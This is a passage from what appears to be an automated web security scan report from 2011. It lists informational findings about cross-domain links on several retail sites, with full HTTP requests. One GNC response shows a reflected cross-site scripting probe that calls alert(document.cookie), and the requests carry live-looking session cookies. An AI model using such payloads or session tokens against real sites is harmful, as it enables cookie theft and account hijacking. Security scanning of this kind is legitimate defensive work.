<a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://affiliate.kickapps.com/service/displayHomePageExperience.kickAction?page=Homepage&amp;as=101672&amp;ab=CMS:HP:CMS:C65">Join Our Community</a>
...[SNIP]...
<br/>
<a onmouseover="this.style.color='#e61d2d'; this.style.text-decoration='underline'" onmouseout="this.style.color='#464646'; this.style.text-decoration='none'" style="font-size: 12px; color: #464646; text-decoration: none" href="http://phenomwater.com/">About Phenom Coconut Water</a>
...[SNIP]...
<div id="containerCurvedBottomGraphic"><img src="http://GNC.imageg.net/images/containerBG.png" /></div>
...[SNIP]...
</ul>

                   <a href="http://www.drugstore.com" target="_blank" class="drugstore">drugstore.com - the uncommon drugstore</a>
...[SNIP]...
<div class="stella_service">
                       <a href="http://www.stellaservice.com/index.php?option=com_score&site=www.gnc.com" target="_blank" class="stella_image"><img src="http://GNC.imageg.net/images/stella.png" alt="Stella Service&trade; Excellent" width="74" height="47" /></a>
                       <a href="http://www.stellaservice.com/index.php?option=com_score&site=www.gnc.com" target="_blank" class="stella_message">The Web's most trusted signal of high quality customer service. <span>
...[SNIP]...
<a href="http://livewellblog.gnc.com/" target="_blank"><img src="http://GNC.imageg.net/images/footer/rss.gif" /></a>
...[SNIP]...
<li><img src="http://GNC.imageg.net/images/AutoDelivery-Footer.jpg" width="194" height="28" alt="Auto Delivery" /></li>
...[SNIP]...
<li><a href="http://gnc.mediaroom.com/">About Us</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=88669&p=irol-investorhome">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.gncfranchising.com">Open a GNC Franchise</a>
...[SNIP]...
<li><a href="http://gnc.mediaroom.com/index.php?s=64">Vendors</a>
...[SNIP]...
<a href="../product/index.jsp?productId=2134195&kw=gold+card&sr=1&origkw=gold card"><img src="http://GNC.imageg.net/images/footer/detailsButton.png" alt="Details" /></a>
...[SNIP]...
<li><img src="http://GNC.imageg.net/images/payment_types.png" width="220" height="59" alt="Discover, MasterCard, Visa, American Express, Bill Me Later, PayPal, Google Checkout" /></li>
...[SNIP]...
<a href="../shop/index.jsp?categoryId=3690178">
                       <img src="http://GNC.imageg.net/images/footer/regionUSA.gif" alt="USA" id="flag" />
                       <span>
...[SNIP]...
<!-- START SCANALERT CODE -->
                   <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.gnc.com"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.gnc.com/22.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<!-- Creation Date:6/13/2008 -->
       <IFRAME src="https://fls.doubleclick.net/activityi;src=1877163;type=homep742;cat=homep168;u1=;u2=1;u3=;u4=;u5=;u6=;u7=;ord=1;num=5025715?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/10040766/csgather.js'></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://eval.bizrate.com/js/survey_126457_1.js"></script>
   

   <iframe width="1" height="1" frameborder="0" src="http://html.aggregateknowledge.com/iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1&senduuid=1">
</iframe>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">
           

           <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3166' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...
<!--You are running on ashprd2_ws_68_3-->


<script src="http://media.gsimedia.net/tg/gsiutt/store76.js"></script>
...[SNIP]...

17.39. https://www.gnc.com/checkout/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /checkout/index.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /checkout/index.jsp?process=orderTrackingLogin HTTP/1.1
Host: www.gnc.com
Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.2.10.1305510217; s_pers=%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20s_nr%3D1305511419003%7C1308103419003%3B%20gpv_p6%3DHome%2520Page%7C1305513219009%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.gnc.com/coreg/index.jsp%2525253Fstep%2525253Dot%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:14 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 93720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<!-- START SCANALERT CODE -->
                   <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.gnc.com"><img width="115" height="32" border="0" src="//images.scanalert.com/meter/www.gnc.com/22.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/10040766/csgather.js'></script>
...[SNIP]...
<!--You are running on ashprd2_ws_64_2-->


   <iframe width="1" height="1" frameborder="0" src="https://html.aggregateknowledge.com/iframe?wid=2&xwid=GNC&uniqueURL=https://www.gnc.com/checkout/index.jsp?process=orderTrackingLogin&senduuid=0">
</iframe>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">
           

           <iframe src='https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3166' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...
<!--You are running on ashprd2_ws_64_2-->


<script src="https://media.gsimedia.net/tg/gsiutt/store76.js"></script>
...[SNIP]...

17.40. http://www.guitarcenter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarcenter.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /?CJAID=10453836&CJPID=2537521 HTTP/1.1
Host: www.guitarcenter.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; CjPID=2537521; CjAID=10453836; ref=; ref_d=5/15/2011 9:40:10 PM; source=4ACJWXX2; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; UNICASOURCE=4ACJWXX2; UNICASOURCEL=4ACJWXX2; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; mbox=check#true#1305510080|session#1305510019406-714170#1305511880|PC#1305510019406-714170.17#1308102028; fcspersisthp-slider=2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:53:36 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
SN: 28
X-Powered-By: ASP.NET
Set-Cookie: CjPID=2537521; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: CjAID=10453836; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: source=4ACJWXX2; path=/
Set-Cookie: UNICASOURCE=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: UNICASOURCEL=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Vary: Accept-Encoding
Content-Length: 217584


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...
<!-- NEW FOR HISTORY BLOCK -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.vintageguitars.net/">Vintage</a>
...[SNIP]...
<div style="background-image: none; border: 0pt none; text-align: left; padding: 5px 0px 0px 3px;"><a style="font-weight: normal;" href="http://www.ourstage.com/go/yournextrecordwithtravisbarker"><img style="border: 1px solid rgb(153, 153, 153);" src="http://images.guitarcenter.com/content/home/ynr.jpg">
...[SNIP]...
<div class="social-links">
<a class="social-media" href="http://www.facebook.com/GuitarCenter" target="_blank">
<img src="http://images.guitarcenter.com/content/gc/hp_slider/icons/facebook.png">
...[SNIP]...
</a>
<a class="social-media" href="http://twitter.com/guitarcenter" target="_blank">
<img src="http://images.guitarcenter.com/content/gc/hp_slider/icons/twitter.png">
...[SNIP]...
</a>
<a class="social-media" href="http://www.youtube.com/guitarcenter" target="_blank">
<img src="http://images.guitarcenter.com/content/gc/hp_slider/icons/youtube.png">
...[SNIP]...
</a>
<a class="social-media" href="http://www.guitarcenterblog.com/" target="_blank">
<img src="http://images.guitarcenter.com/content/gc/hp_slider/icons/atgc.png">
...[SNIP]...
<br><script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0009/8956.js"></script>
...[SNIP]...
<li><a href="http://www.vintageguitars.net/">Vintage Gear</a>
...[SNIP]...
<li><a href="http://www.gcpro.com/" target="_blank">GC Pro</a>
...[SNIP]...
<li><a href="http://paypal.com/" target="_blank"><img src="/includes/guitarcenter/images/buttons/paypal.gif" />
...[SNIP]...
<li><a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.GUITARCENTER.COM&lang=en" target="_blank"><img src="/includes/guitarcenter/images/buttons/verisign.gif" />
...[SNIP]...
<li><a href="http://www.pricegrabber.com/rating_getreview.php/retid=5866" target="_blank"><img src="/includes/guitarcenter/images/buttons/pricegrabber.gif" />
...[SNIP]...
<li><a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--141658.html" target="_blank"><img src="https://medals.bizrate.com/medals/dynamic/141658_medal.gif" /></a>
...[SNIP]...
<li><a href="http://www.facebook.com/GuitarCenter"><img src="/includes/guitarcenter/images/buttons/facebook.png" target="_blank"/>
...[SNIP]...
<li><a href="http://twitter.com/guitarcenter"><img src="/includes/guitarcenter/images/buttons/twitter.png" target="_blank"/>
...[SNIP]...
<li><a href="http://www.youtube.com/guitarcenter"><img src="/includes/guitarcenter/images/buttons/youtube.png" target="_blank"/>
...[SNIP]...
<li><a href="http://www.guitarcenterblog.com/"><img src="/includes/guitarcenter/images/buttons/gcblog.png" target="_blank"/>
...[SNIP]...
<noscript>
<iframe src="http://view.atdmt.com/iaction/9k1gcr_GCcomRetargeting_1" width="1" height="1"
frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0"
leftmargin="0">
</iframe>
...[SNIP]...

17.41. https://www.guitarcenter.com/MyAccount/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.guitarcenter.com
Path:   /MyAccount/Login.aspx

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=5

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 02:11:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
SN: 32
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 27444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/includes/guitarcenter/GuitarCenter.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.GUITARCENTER.COM&lang=en" target="_blank"><img src="/includes/guitarcenter/images/buttons/verisign.gif" />
...[SNIP]...
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--141658.html" target="_blank"><img src="https://medals.bizrate.com/medals/dynamic/141658_medal.gif" /></a>
...[SNIP]...

17.42. https://www.helzberg.com/account/login.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /account/login.do

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /account/login.do?method=view HTTP/1.1
Host: www.helzberg.com
Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305511291580}; s_sq=mlhelzbprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.helzberg.com/account.do%25253Fmethod%25253Dstart%2526ot%253DA; JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: JSP/2.1
Content-Language: en-US
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Mon, 16 May 2011 10:45:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:45:10 GMT
Connection: keep-alive
Set-Cookie: customer=none; Expires=Wed, 29-May-2013 10:45:10 GMT; Path=/
Set-Cookie: basket=none; Expires=Mon, 30-May-2011 10:45:10 GMT; Path=/
Content-Length: 39770


       
...[SNIP]...
<!-- google analytics tag insert -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</body> tags, as close as possible to the opening tag.
Creation Date: 10/15/2010
-->


<iframe src="https://fls.doubleclick.net/activityi;src=1564432;type=generl;cat=gen;u1=/account/login.do;ord=-127353189?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>
   
   
                                                   <script language='javascript' src='https://dsa.csdata1.com/data/js/1066060/edata1.js'></script>
...[SNIP]...
-bin/webscr?cmd=xpt/Marketing/popup/OLCWhatIsPayPal-outside','olcwhatispaypal','toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=yes, resizable=yes, width=400, height=350');"><img src="https://www.paypal.com/en_US/i/logo/PayPal_mark_60x38.gif" border="0" alt="Acceptance Mark"></a>
...[SNIP]...
<td valign="middle">
                       <script src=https://seal.verisign.com/getseal?host_name=www.helzberg.com&size=S&use_flash=NO&use_transparent=NO></script>
...[SNIP]...
<td valign="middle">
                       <a href="https://www.mcafeesecure.com/RatingVerify?ref=www.helzberg.com" target="_blank">
                           <img src="//images.scanalert.com/meter/www.helzberg.com/13.gif" border="0"
                               alt="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses nd online scams"
                               oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"/>

                       </a>
...[SNIP]...

17.43. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homedepot.ca
Path:   /webapp/wcs/stores/servlet/Home

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:53:26 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Wed, 12 May 2021 09:19:01 GMT
Content-Length: 95123


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
</p>
       
       
                       <a class="feature eflyer" href="http://director.homedepot.ca/HDP/?BannerCode=HDP&amp;Language=en"><span>
...[SNIP]...
<div class="featured-destinations">

<a class="shopping-cart" href="https://secure.homedepot.ca/webapp/wcs/stores/servlet/OrderItemDisplay?storeId=10051&jspStoreDir=HomeDepotCanada&catalogId=10051&langId=-15&krypto=pKJF8DWcRtPBjBInNkE5ng%3D%3D&ddkey=OrderCalculate">
<span class="label">
...[SNIP]...
<div id="image-adspot" class="section">
<a href="http://director.flyerservices.com/HDP/PublicationDirector.ashx?BannerName=HDP&amp;Language=EN&amp;PublicationId=a6a3a357-41d9-4e06-96e1-6b43243a11f4&amp;Version=Flash"><img src="http://www.homedepot.ca/wcsstore/HomeDepotCanada/images/espots/20110510/dreambook-teaser.jpg" alt="Dreambook">
...[SNIP]...
<div class="section simple-sec" id="auction">
<a href="https://secure.homedepot.ca/webapp/wcs/stores/servlet/AuctionHomeView?storeId=10051&catalogId=10051&langId=-15"><h2>
...[SNIP]...
<span class="text-link"><a href="https://secure.homedepot.ca/webapp/wcs/stores/servlet/AuctionHomeView?storeId=10051&catalogId=10051&langId=-15">Place Bid</a>
...[SNIP]...
<h4>
<a href="https://hdc.centah.com/web/?lang=eng&service&intid=homepage_services">Installation Services</a>
...[SNIP]...
</h4>
<a href="https://hdc.centah.com/web/?lang=eng&service&intid=homepage_services"><img src="http://www.homedepot.ca/wcsstore/HomeDepotCanada/images/home-page/services/InstallationServices.jpg" alt="Installation Services">
...[SNIP]...
</a> | <a href="http://diy.homedepot.ca/diy/project.jsp?pid=399&langId=-15&section=overview">Install a Light Fixture</a>
...[SNIP]...
<p>
<a href="http://director.flyerservices.com/HDP/PublicationDirector.ashx?BannerName=HDP&Language=EN&PublicationId=f3a03e7f-fb3f-4292-b7bc-cb41154d9a9b">Kitchen Planner</a>
...[SNIP]...
</a> | <a href="http://director.flyerservices.com/HDP/PublicationDirector.ashx?BannerName=HDP&Language=EN&PublicationId=a6a3a357-41d9-4e06-96e1-6b43243a11f4&Version=Flash">DreamBook</a>
...[SNIP]...
</a> | <a href="http://director.flyerservices.com/HDP/PublicationDirector.ashx?BannerName=HDP&Language=EN&PublicationId=a6a3a357-41d9-4e06-96e1-6b43243a11f4&Version=Flash">DreamBook</a>
...[SNIP]...
</a>
<a class="icon-accessibility" href="http://essentialaccessibility.com/" target="_blank"></a>
...[SNIP]...
<li><a href="http://www.homedepotopinion.com/" target="_blank">Customer Survey</a>
...[SNIP]...
<li><a href="https://secure.homedepot.ca/webapp/wcs/stores/servlet/PrivacyPreferencesDisplay?storeId=10051&catalogId=10051&langId=-15">Privacy Preferences</a>
...[SNIP]...
<li><a href="http://www.homedepot.monstermediaworks.ca/">Careers in Canada</a>
...[SNIP]...
<li><a href="http://www.homedepot.com/webapp/wcs/stores/servlet/HomePageView?storeId=10051&catalogId=10053&langId=-1">homedepot.com</a>
...[SNIP]...
</span>
<a class="button facebook-button" href="http://www.facebook.com/homedepot" target="_blank">Facebook</a>
...[SNIP]...
</span>
<a class="button twitter-button" href="http://www.twitter.com/homedepotcanada" target="_blank">Twitter</a>
...[SNIP]...
<!--
       By use of this code snippet, I agree to the Brightcove Publisher T and C found at https://accounts.brightcove.com/en/terms-and-conditions/.
       -->
       
       <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
</script>
       
               
       <script src="//www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1"></script>
...[SNIP]...

17.44. http://www.imiclk.com/cgi/r.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; CH=18654,53bro,18661,53bro,28363,53br0,22244,53br0,24785,53brJ,24783,53brJ,18653,53bro,33114,00000,24782,53brJ,32619,00000,32620,00000; RQ=985,53bro,1445,53bro,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,3238,53bro,3677,53bro,3387,53br2,3388,53brH,3389,53brJ,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2; YU=3619a40dde8a3ac4dfc0a3674599e768-53bro

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:57:27 GMT
Connection: close
Set-Cookie: CH=24785,53c51,22244,53br0,28363,53br0,18661,53bro,18654,53bro,24783,53c51,33114,00000,18653,53bro,24782,53c51,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:07:33 GMT
Set-Cookie: RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ,3390,53c51,985,53bro,1445,53bro,1470,53c51,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c51,3173,53c51,3190,53c51,3238,53bro,3677,53bro,3678,53c51; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:07:33 GMT
Content-Length: 982

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://ad.trafficmp.com/a/bpix?adv=598&amp;id=255&amp;format=1305511047" alt="" border="0" width="1" height="1">
<img src="http://idcs.interclick.com/Segment.aspx?sid=cab0b2f4-a675-49e9-abc7-97bd867f44f5&amp;cacheBust=1305511047" alt="" border="0" width="1" height="1">
<img src="http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=25222;sz=1x1;ord=1305511047?" alt="" border="0" width="1" height="1">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&amp;srvc=1&amp;betr=pacsunwear_cs=1&amp;betq=11722=423719nc=1305511047?" alt="" border="0" width="1" height="1">
<img src="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9MTI1MiZ0bD0xNTc2ODAw=1305511047" alt="" border="0" width="1" height="1">
<img src="http://pixel.mathtag.com/data/img?mt_id=100039&amp;mt_dcid=1305511047" alt="" border="0" width="1" height="1"></body>
...[SNIP]...

17.45. http://www.imiclk.com/cgi/r.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /cgi/r.cgi?m=3&mid=fe6rHfZ1&ptid=HOME HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
